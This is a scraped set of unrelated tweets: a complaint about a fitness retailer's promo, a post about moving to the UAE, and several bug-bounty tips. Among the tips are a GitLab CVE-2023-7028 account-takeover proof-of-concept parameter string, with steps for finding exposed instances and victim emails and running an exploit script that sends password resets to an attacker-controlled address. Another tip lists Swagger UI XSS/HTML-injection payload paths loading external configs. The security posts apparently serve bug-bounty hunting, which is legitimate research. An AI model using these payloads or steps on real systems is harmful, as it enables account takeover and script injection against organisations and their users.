@myfitness_IN Your payday sale promotion is misleading. The website advertises up to 20% + 5% off a free protein bar on orders ₹599 & above. However, using the payday promo disqualifies us from the protein bar offer, which isn't mentioned clearly. Please clarify.
#MisleadingOffer
If you’re frustrated with Taxes and Nirmala Tai, move to the UAE!
- 3 hrs from Delhi
- Better pay & living
- Mostly Indians + some foreigners for aesthetics
- No income tax
- Easy visa process
- Safe for everyone
Just updated!!!
I've scanned over 175k public GitHub repos and around 35 million files to create a bunch of useful web app fuzzing lists.
https://t.co/rRIICraIT1
#infosec #bugbountytips #cybersecurity
Bug Bounty Tips: Finding additional targets connected to your wide-scope target.
Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.?
Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag.
Here's how to access this valuable data:
1️⃣ You must log in to https://t.co/xil5tQQ3O4
2️⃣ Visit https://t.co/tGh1n2lJjM
You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets.
#BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️
Bug hunters: Looking for high-quality, technical content?
Here's a huge list of infosec content creators!
There's so much info including:
🪪 Name
🧑‍🎨 Content type
🌎 Country
🗓️ Schedule
🔗 Social links
🕕 Timezone
Make sure to bookmark this 🔗 https://t.co/9ebrDgcct9
🔍GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method.
Known POC:
user[email][][email protected]&user[email][][email protected]
Identifying vulnerable targets:
1️⃣ Utilize the nuclei template at https://t.co/9gC1rBxVnB to spot exposed GitLab instances.
2️⃣ Hunt for potentially valid victim org emails through various sources. An effortless choice is https://t.co/s29tuRAYzQ.
3️⃣ Install and execute the Python script found at https://t.co/P55jST9rET on these hosts. If the target is vulnerable, you'll likely receive an email on your attacker-controlled server.
Usage: https://t.co/iDz14sk5pF [-u URL] -v victim@example[.]com -a attacker@wearehackerone[.]com
#BugBountyTips #HackerOne #BugCrowd #Security #InfoSec #SecurityTips
If you find any Swagger UI endpoint, try the following payloads for XSS + HTML injection.
/index.html?configUrl=https://t.co/BCj67bsP36
/index.html?configUrl=https://t.co/ZNdLs70Fa4
/index.html?config=https://t.co/bUa05PuwQf
/index.html?configUrl=https://t.co/hJKPHCQ4ze